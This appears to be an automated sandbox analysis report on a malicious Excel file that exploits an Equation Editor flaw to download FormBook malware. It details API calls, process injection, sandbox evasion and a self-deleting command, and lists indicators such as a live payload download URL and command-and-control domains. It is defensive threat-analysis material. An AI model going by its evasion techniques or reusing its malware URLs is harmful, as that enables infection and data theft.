      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FAD0 NtAllocateVirtualMemory,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FAE8 NtQueryInformationProcess,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FBB8 NtQueryInformationToken,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FB68 NtFreeVirtualMemory,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FC90 NtUnmapViewOfSection,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FC60 NtMapViewOfSection,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FD8C NtDelayExecution,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FDC0 NtQuerySystemInformation,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FEA0 NtReadVirtualMemory,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FED0 NtAdjustPrivilegesToken,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FFB4 NtCreateSection,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_009110D0 NtOpenProcessToken
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_00910060 NtQuerySection
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_009101D4 NtSetValueKey
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0091010C NtOpenDirectoryObject
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_00911148 NtOpenThread
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090F8CC NtWaitForSingleObject
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_00911930 NtSetContextThread
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090F938 NtWriteFile
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FAB8 NtQueryValueKey
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FA20 NtQueryInformationFile
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FA50 NtEnumerateValueKey
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FBE8 NtQueryVirtualMemory
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FB50 NtCreateKey
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090FC30 NtOpenProcess
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C700C4 NtCreateFile,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C707AC NtCreateMutant,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6F9F0 NtClose,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6F900 NtReadFile,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FAE8 NtQueryInformationProcess,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FBB8 NtQueryInformationToken,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FB50 NtCreateKey,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FB68 NtFreeVirtualMemory,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FC60 NtMapViewOfSection,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FDC0 NtQuerySystemInformation,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FD8C NtDelayExecution,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FFB4 NtCreateSection,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C710D0 NtOpenProcessToken
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C70048 NtProtectVirtualMemory
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C70060 NtQuerySection
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C70078 NtResumeThread
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C701D4 NtSetValueKey
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C71148 NtOpenThread
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C7010C NtOpenDirectoryObject
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6F8CC NtWaitForSingleObject
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C71930 NtSetContextThread
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6F938 NtWriteFile
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FAD0 NtAllocateVirtualMemory
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FAB8 NtQueryValueKey
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FA50 NtEnumerateValueKey
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FA20 NtQueryInformationFile
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FBE8 NtQueryVirtualMemory
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FC90 NtUnmapViewOfSection
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C70C40 NtGetContextThread
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FC48 NtSetInformationFile
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FC30 NtOpenProcess
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C71D80 NtSuspendThread
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FD5C NtEnumerateKey
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FEA0 NtReadVirtualMemory
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FE24 NtWriteVirtualMemory
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FFFC NtCreateProcessEx
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00C6FF34 NtQueueApcThread
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_000985B0 NtCreateFile
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_00098660 NtReadFile
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 8_2_000986E0 NtClose
      Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe 2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
      Source: Joe Sandbox View, Dropped File: C:\Users\Public\vbc.exe 2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
      Source: C:\Users\Public\vbc.exe, Memory allocated: 76F90000 page execute and read and write
      Source: C:\Users\Public\vbc.exe, Memory allocated: 76E90000 page execute and read and write
      Source: Sajeeb09908976745344567.xlsx, Virustotal: Detection: 29%
      Source: Sajeeb09908976745344567.xlsx, ReversingLabs: Detection: 21%
      Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exe, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
      Source: C:\Windows\SysWOW64\netsh.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\~$Sajeeb09908976745344567.xlsx
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRC30.tmp
      Source: classification engine, Classification label: mal100.troj.expl.evad.winXLSX@9/15@2/2
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_00402053 CoCreateInstance,MultiByteToWideChar
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
      Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp, Binary or memory string: .VBPud<_
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
      Source: Window Recorder, Window detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: netsh.pdb source: vbc.exe, 00000005.00000002.556406324.0000000000553000.00000004.00000020.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, netsh.exe

      Data Obfuscation:

      barindex
      Detected unpacking (changes PE section rights)Show sources
      Source: C:\Users\Public\vbc.exeUnpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll

      Boot Survival:

      Drops PE files to the user root directory
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10008836 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_10008836
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2724Thread sleep time: -300000s >= -30000s
      Source: C:\Windows\SysWOW64\netsh.exe TID: 2628Thread sleep time: -30000s >= -30000s
      Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc 5_2_004088C0
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E93 FindFirstFileA,FindClose,4_2_00405E93
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_004054BD
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00402671 FindFirstFileA,4_2_00402671
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1000CDB2 IsDebuggerPresent,4_2_1000CDB2
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100093F8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_100093F8
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100098C2 GetProcessHeap,4_2_100098C2
      Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: Debug
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001A402 mov eax, dword ptr fs:[00000030h]4_2_1001A402
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001A616 mov eax, dword ptr fs:[00000030h]4_2_1001A616
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001A6C7 mov eax, dword ptr fs:[00000030h]4_2_1001A6C7
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001A706 mov eax, dword ptr fs:[00000030h]4_2_1001A706
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001A744 mov eax, dword ptr fs:[00000030h]4_2_1001A744
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009226F8 mov eax, dword ptr fs:[00000030h]5_2_009226F8
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C826F8 mov eax, dword ptr fs:[00000030h]8_2_00C826F8
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B30 LdrLoadDll,5_2_00409B30
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10009B60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_10009B60

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
      Source: C:\Windows\explorer.exeDomain query: www.washingtonboatrentals.com
      Sample uses process hollowing technique
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1640000
      Maps a DLL or memory area into another process
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Injects a PE file into a foreign processes
      Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
      Queues an APC in another process (thread injection)
      Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
      Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 1764
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
      Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100098DF cpuid 4_2_100098DF
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10012E10 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_10012E10
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_004030FB

      Lowering of HIPS / PFW / Operating System Security Settings:

      Uses netsh to modify the Windows network and firewall settings
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

      Stealing of Sensitive Information:

      Yara detected FormBook

      Remote Access Functionality:

      Yara detected FormBook

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Application Shimming1Process Injection612Masquerading111OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsApplication Shimming1Disable or Modify Tools2LSASS MemorySecurity Software Discovery251Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncSystem Information Discovery115Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      [Behavior graph figure. Behavior Graph ID: 502271, Sample: Sajeeb09908976745344567.xlsx, Startdate: 13/10/2021, Architecture: WINDOWS, Score: 100. Process chain: EQNEDT32.EXE started vbc.exe, which started a second vbc.exe, which injected into explorer.exe; explorer.exe started netsh.exe, which started cmd.exe. EXCEL.EXE was started separately.]


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      Sajeeb09908976745344567.xlsx | 30% | Virustotal |
      Sajeeb09908976745344567.xlsx | 22% | ReversingLabs | Document-Excel.Exploit.CVE-2017-11882

      Dropped Files

      Source | Detection | Scanner | Label
      C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML |
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 36% | ReversingLabs | Win32.Trojan.Nsisx
      C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll | 0% | ReversingLabs |
      C:\Users\Public\vbc.exe | 36% | ReversingLabs | Win32.Trojan.Nsisx

      Unpacked PE Files

      Source | Detection | Scanner | Label
      5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
      4.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
      4.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
      8.2.netsh.exe.6d3da0.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
      5.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
      4.2.vbc.exe.3030000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
      8.2.netsh.exe.2c6796c.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
      5.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

      Domains

      No Antivirus matches

      URLs

      Source | Detection | Scanner | Label
      http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
      http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
      http://www.mozilla.com0 | 0% | URL Reputation | safe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
      http://treyresearch.net | 0% | URL Reputation | safe
      http://www.washingtonboatrentals.com/mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ== | 0% | Avira URL Cloud | safe
      http://java.sun.com | 0% | Virustotal |
      http://java.sun.com | 0% | Avira URL Cloud | safe
      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
      www.naplesconciergerealty.com/mxnu/ | 7% | Virustotal |
      www.naplesconciergerealty.com/mxnu/ | 100% | Avira URL Cloud | malware
      http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
      http://www.%s.comPA | 0% | URL Reputation | safe
      http://192.3.110.172/000900/vbc.exe | 100% | Avira URL Cloud | malware
      http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      www.washingtonboatrentals.com | 3.64.163.50 | true | true | | unknown

        Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        http://www.washingtonboatrentals.com/mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ== | true | Avira URL Cloud: safe | unknown
        www.naplesconciergerealty.com/mxnu/ | true | 7%, Virustotal; Avira URL Cloud: malware | low
        http://192.3.110.172/000900/vbc.exe | true | Avira URL Cloud: malware | unknown

        URLs from Memory and Binaries


                                      Contacted IPs


                                      Public

                                      IP | Domain | Country | ASN | ASN Name | Malicious
                                      3.64.163.50 | www.washingtonboatrentals.com | United States | 16509 | AMAZON-02US | true
                                      192.3.110.172 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:502271
                                      Start date:13.10.2021
                                      Start time:19:01:48
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 11m 27s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:Sajeeb09908976745344567.xlsx
                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                      Number of analysed new started processes analysed:11
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winXLSX@9/15@2/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 18.3% (good quality ratio 17.4%)
                                      • Quality average: 77.5%
                                      • Quality standard deviation: 27.9%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 88
                                      • Number of non-executed functions: 81
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .xlsx
                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                      • Attach to Office via COM
                                      • Scroll down
                                      • Close Viewer
                                      Warnings:
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                      • Not all processes were analyzed, report is missing behavior information

                                      Simulations

                                      Behavior and APIs

Time | Type | Description
19:02:52 | API Interceptor | 83x Sleep call for process: EQNEDT32.EXE modified
19:03:00 | API Interceptor | 60x Sleep call for process: vbc.exe modified
19:03:29 | API Interceptor | 229x Sleep call for process: netsh.exe modified
19:04:15 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                      Joe Sandbox View / Context

                                      IPs


                                      Domains

Match | Associated Sample Name / URL | Detection | Context
www.washingtonboatrentals.com | dtMT5xGa54.exe | malicious | 3.64.163.50
www.washingtonboatrentals.com | 549TXoJm6p.exe | malicious | 3.64.163.50

                                      ASN


                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | TransportLabel_1189160070.xlsx | malicious
C:\Users\Public\vbc.exe | TransportLabel_1189160070.xlsx | malicious
C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll | dtMT5xGa54.exe | malicious
C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll | TransportLabel_1189160070.xlsx | malicious

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:downloaded
                                              Size (bytes):290617
                                              Entropy (8bit):7.9395134807721
                                              Encrypted:false
                                              SSDEEP:6144:wBlL/c7HU+ICkZsFE03JDT37iHxU1D/RmNOZeXBiFkJTstHJXd0mU:Ce7HUDCysO0dLiWDc8ZHKmHImU
                                              MD5:0031A23B4BB6ABCDCCC5F8122DE5FCB5
                                              SHA1:BE50CDBB0AF4C77229E3DE0EC7F34088AAE64DC2
